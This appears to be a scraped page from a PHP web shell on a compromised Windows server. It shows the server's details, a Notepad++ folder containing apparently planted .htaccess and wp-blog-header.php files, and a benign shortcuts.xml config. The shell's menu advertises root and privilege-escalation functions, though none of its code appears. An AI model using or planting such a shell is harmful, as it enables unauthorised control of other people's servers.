Windows NT KAMIDAKI 10.0 build 19045 (Windows 10) AMD64
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.3.9
Server IP : 192.168.3.16 & Your IP : 216.73.216.204
Domains :
Cant Read [ /etc/named.conf ]
User : SISTEMA
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
C: /
Program Files /
Notepad++ /
Delete
Unzip
Name
Size
Permission
Date
Action
autoCompletion
[ DIR ]
drwxrwxrwx
2023-10-16 00:16
contextMenu
[ DIR ]
drwxrwxrwx
2023-10-16 00:16
functionList
[ DIR ]
drwxrwxrwx
2023-10-16 00:16
localization
[ DIR ]
drwxrwxrwx
2023-10-16 00:16
plugins
[ DIR ]
drwxrwxrwx
2023-10-16 00:16
themes
[ DIR ]
drwxrwxrwx
2023-10-16 00:16
updater
[ DIR ]
drwxrwxrwx
2023-10-16 00:16
.htaccess
197
B
-r--r--r--
2025-06-02 09:56
LICENSE
34.67
KB
-rw-rw-rw-
2021-08-15 02:20
change.log
904
B
-rw-rw-rw-
2023-09-06 23:16
contextMenu.xml
4.81
KB
-rw-rw-rw-
2023-02-10 23:57
langs.model.xml
452.74
KB
-rw-rw-rw-
2023-08-22 14:30
notepad++.exe
6.61
MB
-rwxrwxrwx
2023-09-06 23:54
nppLogNulContentCorruptionIssue.xml
0
B
-rw-rw-rw-
2021-12-05 05:28
readme.txt
1.49
KB
-rw-rw-rw-
2021-05-27 00:57
shortcuts.xml
3.08
KB
-rw-rw-rw-
2022-12-29 19:17
stylers.model.xml
178.58
KB
-rw-rw-rw-
2023-03-28 12:47
uninstall.exe
271.7
KB
-rwxrwxrwx
2023-10-16 00:16
wp-blog-header.php
2.73
KB
-r--r--r--
2025-06-02 09:56
Save
Rename
<?xml version="1.0" encoding="UTF-8" ?> <NotepadPlus> <InternalCommands /> <!-- You can organize you Macro menu & Run menu by adding the attribute 'FolderName="My sub-menu name"' to any Macro or Command node. This will place the corresponding node within a "My sub-menu name" sub-menu in the appropriate menu. Please consider the following examples: --> <Macros> <!-- <Macro name="aa" Ctrl="no" Alt="no" Shift="no" Key="0"> <Action type="1" message="2170" wParam="0" lParam="0" sParam="A" /> <Action type="1" message="2170" wParam="0" lParam="0" sParam="A" /> </Macro> <Macro name="az" Ctrl="no" Alt="no" Shift="no" Key="0" FolderName="words"> <Action type="1" message="2170" wParam="0" lParam="0" sParam="a" /> <Action type="1" message="2170" wParam="0" lParam="0" sParam="z" /> </Macro> <Macro name="qw" Ctrl="no" Alt="no" Shift="no" Key="0" FolderName="words"> <Action type="1" message="2170" wParam="0" lParam="0" sParam="q" /> <Action type="1" message="2170" wParam="0" lParam="0" sParam="w" /> </Macro> <Macro name="BB" Ctrl="no" Alt="no" Shift="no" Key="0"> <Action type="1" message="2170" wParam="0" lParam="0" sParam="B" /> <Action type="1" message="2170" wParam="0" lParam="0" sParam="B" /> </Macro> <Macro name="Trim Trailing Space and Save" Ctrl="no" Alt="yes" Shift="yes" Key="83" FolderName="func"> <Action type="2" message="0" wParam="42024" lParam="0" sParam="" /> <Action type="2" message="0" wParam="41006" lParam="0" sParam="" /> </Macro> --> <Macro name="Trim Trailing Space and Save" Ctrl="no" Alt="yes" Shift="yes" Key="83"> <Action type="2" message="0" wParam="42024" lParam="0" sParam="" /> <Action type="2" message="0" wParam="41006" lParam="0" sParam="" /> </Macro> </Macros> <UserDefinedCommands> <!-- <Command name="Get PHP help" Ctrl="no" Alt="yes" Shift="no" Key="112" FolderName="Help on Internet">https://www.php.net/$(CURRENT_WORD)</Command> <Command name="Wikipedia Search" Ctrl="no" Alt="yes" Shift="no" Key="114" FolderName="Help on Internet">https://en.wikipedia.org/wiki/Special:Search?search=$(CURRENT_WORD)</Command> <Command name="Open selected file path in new instance" Ctrl="no" Alt="yes" Shift="no" Key="117">$(NPP_FULL_FILE_PATH) $(CURRENT_WORD) -nosession -multiInst</Command> --> <Command name="Get PHP help" Ctrl="no" Alt="yes" Shift="no" Key="112">https://www.php.net/$(CURRENT_WORD)</Command> <Command name="Wikipedia Search" Ctrl="no" Alt="yes" Shift="no" Key="114">https://en.wikipedia.org/wiki/Special:Search?search=$(CURRENT_WORD)</Command> <Command name="Open selected file path in new instance" Ctrl="no" Alt="yes" Shift="no" Key="117">$(NPP_FULL_FILE_PATH) $(CURRENT_WORD) -nosession -multiInst</Command> </UserDefinedCommands> <PluginCommands /> <ScintillaKeys /> </NotepadPlus>